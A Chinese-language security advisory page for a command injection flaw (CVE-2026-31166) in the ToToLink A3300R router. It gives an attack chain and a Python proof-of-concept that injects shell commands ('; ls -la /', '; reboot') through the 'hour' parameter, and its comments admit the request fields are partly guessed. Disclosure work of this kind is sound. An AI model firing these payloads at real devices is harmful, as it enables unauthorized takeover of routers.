CVE-2026-31166 CVSS 6.5 中危

CVE-2026-31166 ToToLink A3300R 命令注入漏洞

披露日期: 2026-04-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-31166

漏洞类型

命令注入

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ToToLink A3300R

漏洞概述

ToToLink A3300R路由器固件v17.0.0cu.557_B20221024版本中存在一个安全漏洞。该漏洞源于/cgi-bin/cstecgi.cgi接口对hour参数的处理不当，允许未经身份验证的远程攻击者通过精心构造的恶意请求执行任意系统命令。由于无需用户交互且攻击复杂度低，该漏洞对设备的安全性构成中等风险，可能导致系统信息泄露或被进一步控制。

技术细节

该漏洞是由于ToToLink A3300R路由器固件在处理特定接口参数时存在输入验证缺失导致的命令注入漏洞。具体而言，/cgi-bin/cstecgi.cgi脚本在处理“hour”参数时，未对用户提交的数据进行充分的边界检查和特殊字符过滤。攻击者可以利用这一缺陷，在参数值中注入恶意的Shell指令。当后端程序将该参数传递给系统Shell执行时，注入的命令将被一同执行。由于该漏洞无需用户交互且不需要预先认证，远程攻击者可通过发送特制的HTTP数据包利用此漏洞，最终导致在目标设备上执行任意系统代码，获取设备控制权。

攻击链分析

STEP 1

信息收集

攻击者扫描网络，识别目标设备为ToToLink A3300R路由器，并确认其运行受影响版本的固件。

STEP 2

构造恶意数据包

攻击者构造HTTP POST请求，目标指向/cgi-bin/cstecgi.cgi，并在hour参数中注入Shell命令（如; reboot）。

STEP 3

发送漏洞利用请求

攻击者将构造好的恶意请求发送给目标设备。由于无需认证，请求直接到达后端处理程序。

STEP 4

命令执行与控制

后端程序未过滤hour参数，直接将其拼接到系统命令中执行。攻击者成功在设备上执行任意命令，获取控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_ip):
    url = f"http://{target_ip}/cgi-bin/cstecgi.cgi"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    # Injecting a command to list files, typically the payload format depends on the specific firmware logic
    # Common payload for command injection includes ';' or '|' or '&'
    payload = "; ls -la /"
    
    # Data payload based on the vulnerability description mentioning 'hour' parameter
    data = {
        "hour": payload,
        "action": "0" # Placeholder action, might vary based on specific endpoint requirement
    }
    
    try:
        response = requests.post(url, headers=headers, data=data, timeout=10)
        if response.status_code == 200:
            print(f"[+] Request sent to {target_ip}")
            print(f"[+] Response body:\n{response.text}")
        else:
            print(f"[-] Failed, status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    target = "192.168.0.1" # Replace with target IP
    exploit(target)

影响范围

ToToLink A3300R v17.0.0cu.557_B20221024

防御指南

临时缓解措施

如果无法立即升级固件，建议将路由器放置在防火墙后，禁止从互联网直接访问其管理端口，并仅允许受信任的内网设备进行管理配置。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表